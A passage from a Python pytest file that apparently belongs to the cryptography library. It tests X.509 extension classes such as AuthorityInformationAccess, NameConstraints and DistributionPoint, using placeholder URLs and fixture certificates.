AuthorityInformationAccessOID.CA_ISSUERS,
"invalid", # type:ignore[arg-type]
)
def test_valid_nonstandard_method(self):
ad = x509.AccessDescription(
ObjectIdentifier("2.999.1"),
x509.UniformResourceIdentifier("http://example.com"),
)
assert ad is not None
def test_repr(self):
ad = x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
)
assert repr(ad) == (
"<AccessDescription(access_method=<ObjectIdentifier(oid=1.3.6"
".1.5.5.7.48.1, name=OCSP)>, access_location=<UniformResource"
"Identifier(value='http://ocsp.domain.com')>)>"
)
def test_eq(self):
ad = x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
)
ad2 = x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
)
assert ad == ad2
def test_ne(self):
ad = x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
)
ad2 = x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
)
ad3 = x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://notthesame"),
)
assert ad != ad2
assert ad != ad3
assert ad != object()
def test_hash(self):
ad = x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
)
ad2 = x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
)
ad3 = x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
)
assert hash(ad) == hash(ad2)
assert hash(ad) != hash(ad3)
class TestPolicyConstraints(object):
def test_invalid_explicit_policy(self):
with pytest.raises(TypeError):
x509.PolicyConstraints("invalid", None) # type:ignore[arg-type]
def test_invalid_inhibit_policy(self):
with pytest.raises(TypeError):
x509.PolicyConstraints(None, "invalid") # type:ignore[arg-type]
def test_both_none(self):
with pytest.raises(ValueError):
x509.PolicyConstraints(None, None)
def test_repr(self):
pc = x509.PolicyConstraints(0, None)
assert repr(pc) == (
"<PolicyConstraints(require_explicit_policy=0, inhibit_policy_ma"
"pping=None)>"
)
def test_eq(self):
pc = x509.PolicyConstraints(2, 1)
pc2 = x509.PolicyConstraints(2, 1)
assert pc == pc2
def test_ne(self):
pc = x509.PolicyConstraints(2, 1)
pc2 = x509.PolicyConstraints(2, 2)
pc3 = x509.PolicyConstraints(3, 1)
assert pc != pc2
assert pc != pc3
assert pc != object()
def test_hash(self):
pc = x509.PolicyConstraints(2, 1)
pc2 = x509.PolicyConstraints(2, 1)
pc3 = x509.PolicyConstraints(2, None)
assert hash(pc) == hash(pc2)
assert hash(pc) != hash(pc3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestPolicyConstraintsExtension(object):
def test_inhibit_policy_mapping(self, backend):
cert = _load_cert(
os.path.join("x509", "department-of-state-root.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.POLICY_CONSTRAINTS,
)
assert ext.critical is True
assert ext.value == x509.PolicyConstraints(
require_explicit_policy=None,
inhibit_policy_mapping=0,
)
def test_require_explicit_policy(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "policy_constraints_explicit.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.POLICY_CONSTRAINTS
)
assert ext.critical is True
assert ext.value == x509.PolicyConstraints(
require_explicit_policy=1,
inhibit_policy_mapping=None,
)
class TestAuthorityInformationAccess(object):
def test_invalid_descriptions(self):
with pytest.raises(TypeError):
x509.AuthorityInformationAccess(
["notanAccessDescription"] # type:ignore[list-item]
)
def test_iter_len(self):
aia = x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
),
]
)
assert len(aia) == 2
assert list(aia) == [
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
),
]
def test_iter_input(self):
desc = [
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
)
]
aia = x509.AuthorityInformationAccess(iter(desc))
assert list(aia) == desc
def test_repr(self):
aia = x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
),
]
)
assert repr(aia) == (
"<AuthorityInformationAccess([<AccessDescription(access_method"
"=<ObjectIdentifier(oid=1.3.6.1.5.5.7.48.1, name=OCSP)>, acces"
"s_location=<UniformResourceIdentifier(value='http://oc"
"sp.domain.com')>)>, <AccessDescription(access_method=<ObjectI"
"dentifier(oid=1.3.6.1.5.5.7.48.2, name=caIssuers)>, access_lo"
"cation=<UniformResourceIdentifier(value='http://domain"
".com/ca.crt')>)>])>"
)
def test_eq(self):
aia = x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
),
]
)
aia2 = x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
),
]
)
assert aia == aia2
def test_ne(self):
aia = x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
),
]
)
aia2 = x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
]
)
assert aia != aia2
assert aia != object()
def test_indexing(self):
aia = x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp2.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp3.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp4.domain.com"),
),
]
)
assert aia[-1] == aia[4]
assert aia[2:6:2] == [aia[2], aia[4]]
def test_hash(self):
aia = x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
),
]
)
aia2 = x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
),
]
)
aia3 = x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.other.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
),
]
)
assert hash(aia) == hash(aia2)
assert hash(aia) != hash(aia3)
class TestSubjectInformationAccess(object):
def test_invalid_descriptions(self):
with pytest.raises(TypeError):
x509.SubjectInformationAccess(
["notanAccessDescription"] # type:ignore[list-item]
)
def test_iter_len(self):
sia = x509.SubjectInformationAccess(
[
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca2.domain.com"),
),
]
)
assert len(sia) == 2
assert list(sia) == [
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca2.domain.com"),
),
]
def test_iter_input(self):
desc = [
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
)
]
sia = x509.SubjectInformationAccess(iter(desc))
assert list(sia) == desc
def test_repr(self):
sia = x509.SubjectInformationAccess(
[
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
)
]
)
assert repr(sia) == (
"<SubjectInformationAccess([<AccessDescription(access_method"
"=<ObjectIdentifier(oid=1.3.6.1.5.5.7.48.5, name=caRepositor"
"y)>, access_location=<UniformResourceIdentifier(value='http"
"://ca.domain.com')>)>])>"
)
def test_eq(self):
sia = x509.SubjectInformationAccess(
[
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca2.domain.com"),
),
]
)
sia2 = x509.SubjectInformationAccess(
[
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca2.domain.com"),
),
]
)
assert sia == sia2
def test_ne(self):
sia = x509.SubjectInformationAccess(
[
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca2.domain.com"),
),
]
)
sia2 = x509.SubjectInformationAccess(
[
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
),
]
)
assert sia != sia2
assert sia != object()
def test_indexing(self):
sia = x509.SubjectInformationAccess(
[
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca2.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca3.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca4.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca5.domain.com"),
),
]
)
assert sia[-1] == sia[4]
assert sia[2:6:2] == [sia[2], sia[4]]
def test_hash(self):
sia = x509.SubjectInformationAccess(
[
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca2.domain.com"),
),
]
)
sia2 = x509.SubjectInformationAccess(
[
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca2.domain.com"),
),
]
)
sia3 = x509.SubjectInformationAccess(
[
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca.domain.com"),
),
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("http://ca3.domain.com"),
),
]
)
assert hash(sia) == hash(sia2)
assert hash(sia) != hash(sia3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestSubjectInformationAccessExtension(object):
def test_sia(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "sia.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_INFORMATION_ACCESS
)
assert ext is not None
assert ext.critical is False
assert ext.value == x509.SubjectInformationAccess(
[
x509.AccessDescription(
SubjectInformationAccessOID.CA_REPOSITORY,
x509.UniformResourceIdentifier("https://my.ca.issuer/"),
),
x509.AccessDescription(
x509.ObjectIdentifier("2.999.7"),
x509.UniformResourceIdentifier(
"gopher://info-mac-archive"
),
),
]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestAuthorityInformationAccessExtension(object):
def test_aia_ocsp_ca_issuers(self, backend):
cert = _load_cert(
os.path.join("x509", "cryptography.io.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_INFORMATION_ACCESS
)
assert ext is not None
assert ext.critical is False
assert ext.value == x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://gv.symcd.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier(
"http://gv.symcb.com/gv.crt"
),
),
]
)
def test_aia_multiple_ocsp_ca_issuers(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "aia_ocsp_ca_issuers.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_INFORMATION_ACCESS
)
assert ext is not None
assert ext.critical is False
assert ext.value == x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp2.domain.com"),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COMMON_NAME, "myCN"
),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, "some Org"
),
]
)
),
),
]
)
def test_aia_ocsp_only(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "aia_ocsp.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_INFORMATION_ACCESS
)
assert ext is not None
assert ext.critical is False
assert ext.value == x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier("http://ocsp.domain.com"),
),
]
)
def test_aia_ca_issuers_only(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "aia_ca_issuers.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_INFORMATION_ACCESS
)
assert ext is not None
assert ext.critical is False
assert ext.value == x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COMMON_NAME, "myCN"
),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, "some Org"
),
]
)
),
),
]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestAuthorityKeyIdentifierExtension(object):
def test_aki_keyid(self, backend):
cert = _load_cert(
os.path.join("x509", "cryptography.io.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_KEY_IDENTIFIER
)
assert ext is not None
assert ext.critical is False
assert ext.value.key_identifier == (
b"\xc3\x9c\xf3\xfc\xd3F\x084\xbb\xceF\x7f\xa0|[\xf3\xe2\x08\xcbY"
)
assert ext.value.authority_cert_issuer is None
assert ext.value.authority_cert_serial_number is None
def test_aki_all_fields(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "authority_key_identifier.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_KEY_IDENTIFIER
)
assert ext is not None
assert ext.critical is False
assert ext.value.key_identifier == (
b"9E>\xca=b\x1d\xea\x86I\xf6Z\xab@\xb7\xa4p\x98\xf1\xec"
)
assert ext.value.authority_cert_issuer == [
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(NameOID.ORGANIZATION_NAME, "PyCA"),
x509.NameAttribute(
NameOID.COMMON_NAME, "cryptography.io"
),
]
)
)
]
assert ext.value.authority_cert_serial_number == 3
def test_aki_no_keyid(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "authority_key_identifier_no_keyid.pem"
),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_KEY_IDENTIFIER
)
assert ext is not None
assert ext.critical is False
assert ext.value.key_identifier is None
assert ext.value.authority_cert_issuer == [
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(NameOID.ORGANIZATION_NAME, "PyCA"),
x509.NameAttribute(
NameOID.COMMON_NAME, "cryptography.io"
),
]
)
)
]
assert ext.value.authority_cert_serial_number == 3
def test_from_certificate(self, backend):
issuer_cert = _load_cert(
os.path.join("x509", "rapidssl_sha256_ca_g3.pem"),
x509.load_pem_x509_certificate,
backend,
)
cert = _load_cert(
os.path.join("x509", "cryptography.io.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_KEY_IDENTIFIER
)
aki = x509.AuthorityKeyIdentifier.from_issuer_public_key(
issuer_cert.public_key()
)
assert ext.value == aki
def test_from_issuer_subject_key_identifier(self, backend):
issuer_cert = _load_cert(
os.path.join("x509", "rapidssl_sha256_ca_g3.pem"),
x509.load_pem_x509_certificate,
backend,
)
cert = _load_cert(
os.path.join("x509", "cryptography.io.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_KEY_IDENTIFIER
)
ski_ext = issuer_cert.extensions.get_extension_for_class(
x509.SubjectKeyIdentifier
)
aki = x509.AuthorityKeyIdentifier.from_issuer_subject_key_identifier(
ski_ext.value
)
assert ext.value == aki
class TestNameConstraints(object):
def test_ipaddress_wrong_type(self):
with pytest.raises(TypeError):
x509.NameConstraints(
permitted_subtrees=[
x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
],
excluded_subtrees=None,
)
with pytest.raises(TypeError):
x509.NameConstraints(
permitted_subtrees=None,
excluded_subtrees=[
x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
],
)
def test_ipaddress_allowed_type(self):
permitted = [x509.IPAddress(ipaddress.IPv4Network("192.168.0.0/29"))]
excluded = [x509.IPAddress(ipaddress.IPv4Network("10.10.0.0/24"))]
nc = x509.NameConstraints(
permitted_subtrees=permitted, excluded_subtrees=excluded
)
assert nc.permitted_subtrees == permitted
assert nc.excluded_subtrees == excluded
def test_invalid_permitted_subtrees(self):
with pytest.raises(TypeError):
x509.NameConstraints("badpermitted", None) # type:ignore[arg-type]
def test_invalid_excluded_subtrees(self):
with pytest.raises(TypeError):
x509.NameConstraints(None, "badexcluded") # type:ignore[arg-type]
def test_no_subtrees(self):
with pytest.raises(ValueError):
x509.NameConstraints(None, None)
def test_permitted_none(self):
excluded = [x509.DNSName("name.local")]
nc = x509.NameConstraints(
permitted_subtrees=None, excluded_subtrees=excluded
)
assert nc.permitted_subtrees is None
assert nc.excluded_subtrees is not None
def test_excluded_none(self):
permitted = [x509.DNSName("name.local")]
nc = x509.NameConstraints(
permitted_subtrees=permitted, excluded_subtrees=None
)
assert nc.permitted_subtrees is not None
assert nc.excluded_subtrees is None
def test_iter_input(self):
subtrees = [x509.IPAddress(ipaddress.IPv4Network("192.168.0.0/24"))]
nc = x509.NameConstraints(iter(subtrees), iter(subtrees))
assert nc.permitted_subtrees is not None
assert list(nc.permitted_subtrees) == subtrees
assert nc.excluded_subtrees is not None
assert list(nc.excluded_subtrees) == subtrees
def test_repr(self):
permitted = [x509.DNSName("name.local"), x509.DNSName("name2.local")]
nc = x509.NameConstraints(
permitted_subtrees=permitted, excluded_subtrees=None
)
assert repr(nc) == (
"<NameConstraints(permitted_subtrees=[<DNSName("
"value='name.local')>, <DNSName(value="
"'name2.local')>], excluded_subtrees=None)>"
)
def test_eq(self):
nc = x509.NameConstraints(
permitted_subtrees=[x509.DNSName("name.local")],
excluded_subtrees=[x509.DNSName("name2.local")],
)
nc2 = x509.NameConstraints(
permitted_subtrees=[x509.DNSName("name.local")],
excluded_subtrees=[x509.DNSName("name2.local")],
)
assert nc == nc2
def test_ne(self):
nc = x509.NameConstraints(
permitted_subtrees=[x509.DNSName("name.local")],
excluded_subtrees=[x509.DNSName("name2.local")],
)
nc2 = x509.NameConstraints(
permitted_subtrees=[x509.DNSName("name.local")],
excluded_subtrees=None,
)
nc3 = x509.NameConstraints(
permitted_subtrees=None,
excluded_subtrees=[x509.DNSName("name2.local")],
)
assert nc != nc2
assert nc != nc3
assert nc != object()
def test_hash(self):
nc = x509.NameConstraints(
permitted_subtrees=[x509.DNSName("name.local")],
excluded_subtrees=[x509.DNSName("name2.local")],
)
nc2 = x509.NameConstraints(
permitted_subtrees=[x509.DNSName("name.local")],
excluded_subtrees=[x509.DNSName("name2.local")],
)
nc3 = x509.NameConstraints(
permitted_subtrees=[x509.DNSName("name.local")],
excluded_subtrees=None,
)
nc4 = x509.NameConstraints(
permitted_subtrees=None,
excluded_subtrees=[x509.DNSName("name.local")],
)
assert hash(nc) == hash(nc2)
assert hash(nc) != hash(nc3)
assert hash(nc3) != hash(nc4)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestNameConstraintsExtension(object):
def test_permitted_excluded(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "nc_permitted_excluded_2.pem"),
x509.load_pem_x509_certificate,
backend,
)
nc = cert.extensions.get_extension_for_oid(
ExtensionOID.NAME_CONSTRAINTS
).value
assert nc == x509.NameConstraints(
permitted_subtrees=[x509.DNSName("zombo.local")],
excluded_subtrees=[
x509.DirectoryName(
x509.Name(
[x509.NameAttribute(NameOID.COMMON_NAME, "zombo")]
)
)
],
)
def test_permitted(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "nc_permitted_2.pem"),
x509.load_pem_x509_certificate,
backend,
)
nc = cert.extensions.get_extension_for_oid(
ExtensionOID.NAME_CONSTRAINTS
).value
assert nc == x509.NameConstraints(
permitted_subtrees=[x509.DNSName("zombo.local")],
excluded_subtrees=None,
)
def test_permitted_with_leading_period(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "nc_permitted.pem"),
x509.load_pem_x509_certificate,
backend,
)
nc = cert.extensions.get_extension_for_oid(
ExtensionOID.NAME_CONSTRAINTS
).value
assert nc == x509.NameConstraints(
permitted_subtrees=[
x509.DNSName(".cryptography.io"),
x509.UniformResourceIdentifier("ftp://cryptography.test"),
],
excluded_subtrees=None,
)
def test_excluded_with_leading_period(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "nc_excluded.pem"),
x509.load_pem_x509_certificate,
backend,
)
nc = cert.extensions.get_extension_for_oid(
ExtensionOID.NAME_CONSTRAINTS
).value
assert nc == x509.NameConstraints(
permitted_subtrees=None,
excluded_subtrees=[
x509.DNSName(".cryptography.io"),
x509.UniformResourceIdentifier("gopher://cryptography.test"),
],
)
def test_permitted_excluded_with_ips(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "nc_permitted_excluded.pem"),
x509.load_pem_x509_certificate,
backend,
)
nc = cert.extensions.get_extension_for_oid(
ExtensionOID.NAME_CONSTRAINTS
).value
assert nc == x509.NameConstraints(
permitted_subtrees=[
x509.IPAddress(ipaddress.IPv4Network("192.168.0.0/24")),
x509.IPAddress(ipaddress.IPv6Network("FF:0:0:0:0:0:0:0/96")),
],
excluded_subtrees=[
x509.DNSName(".domain.com"),
x509.UniformResourceIdentifier("http://test.local"),
],
)
def test_single_ip_netmask(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "nc_single_ip_netmask.pem"),
x509.load_pem_x509_certificate,
backend,
)
nc = cert.extensions.get_extension_for_oid(
ExtensionOID.NAME_CONSTRAINTS
).value
assert nc == x509.NameConstraints(
permitted_subtrees=[
x509.IPAddress(ipaddress.IPv6Network("FF:0:0:0:0:0:0:0/128")),
x509.IPAddress(ipaddress.IPv4Network("192.168.0.1/32")),
],
excluded_subtrees=None,
)
def test_invalid_netmask(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "nc_invalid_ip_netmask.pem"),
x509.load_pem_x509_certificate,
backend,
)
with pytest.raises(ValueError):
cert.extensions.get_extension_for_oid(
ExtensionOID.NAME_CONSTRAINTS
)
def test_certbuilder(self, backend):
permitted = [
".example.org",
".xn--4ca7aey.example.com",
"foobar.example.net",
]
private_key = RSA_KEY_2048.private_key(backend)
builder = _make_certbuilder(private_key)
builder = builder.add_extension(
NameConstraints(
permitted_subtrees=list(map(DNSName, permitted)),
excluded_subtrees=[],
),
True,
)
cert = builder.sign(private_key, hashes.SHA1(), backend)
result = [
x.value
for x in cert.extensions.get_extension_for_class(
NameConstraints
).value.permitted_subtrees
]
assert result == permitted
class TestDistributionPoint(object):
def test_distribution_point_full_name_not_general_names(self):
with pytest.raises(TypeError):
x509.DistributionPoint(
["notgn"], None, None, None # type:ignore[list-item]
)
def test_distribution_point_relative_name_not_name(self):
with pytest.raises(TypeError):
x509.DistributionPoint(
None, "notname", None, None # type:ignore[arg-type]
)
def test_distribution_point_full_and_relative_not_none(self):
with pytest.raises(ValueError):
x509.DistributionPoint(
"data", "notname", None, None # type:ignore[arg-type]
)
def test_crl_issuer_not_general_names(self):
with pytest.raises(TypeError):
x509.DistributionPoint(
None, None, None, ["notgn"] # type:ignore[list-item]
)
def test_reason_not_reasonflags(self):
with pytest.raises(TypeError):
x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://crypt.og/crl")],
None,
frozenset(["notreasonflags"]), # type:ignore[list-item]
None,
)
def test_reason_not_frozenset(self):
with pytest.raises(TypeError):
x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://crypt.og/crl")],
None,
[x509.ReasonFlags.ca_compromise], # type:ignore[arg-type]
None,
)
def test_disallowed_reasons(self):
with pytest.raises(ValueError):
x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://crypt.og/crl")],
None,
frozenset([x509.ReasonFlags.unspecified]),
None,
)
with pytest.raises(ValueError):
x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://crypt.og/crl")],
None,
frozenset([x509.ReasonFlags.remove_from_crl]),
None,
)
def test_reason_only(self):
with pytest.raises(ValueError):
x509.DistributionPoint(
None, None, frozenset([x509.ReasonFlags.aa_compromise]), None
)
def test_eq(self):
dp = x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://crypt.og/crl")],
None,
frozenset([x509.ReasonFlags.superseded]),
[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COMMON_NAME, "Important CA"
)
]
)
)
],
)
dp2 = x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://crypt.og/crl")],
None,
frozenset([x509.ReasonFlags.superseded]),
[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COMMON_NAME, "Important CA"
)
]
)
)
],
)
assert dp == dp2
def test_ne(self):
dp = x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://crypt.og/crl")],
None,
frozenset([x509.ReasonFlags.superseded]),
[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COMMON_NAME, "Important CA"
)
]
)
)
],
)
dp2 = x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://crypt.og/crl")],
None,
None,
None,
)
assert dp != dp2
assert dp != object()
def test_iter_input(self):
name = [x509.UniformResourceIdentifier("http://crypt.og/crl")]
issuer = [
x509.DirectoryName(
x509.Name(
[x509.NameAttribute(NameOID.COMMON_NAME, "Important CA")]
)
)
]
dp = x509.DistributionPoint(
iter(name),
None,
frozenset([x509.ReasonFlags.ca_compromise]),
iter(issuer),
)
assert dp.full_name is not None
assert list(dp.full_name) == name
assert dp.crl_issuer is not None
assert list(dp.crl_issuer) == issuer
def test_repr(self):
